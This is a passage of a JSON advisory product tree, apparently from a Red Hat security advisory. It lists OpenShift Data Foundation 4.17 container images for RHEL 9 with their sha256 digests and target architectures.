"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le"
},
"product_reference": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64"
},
"product_reference": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
},
"product_reference": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64"
},
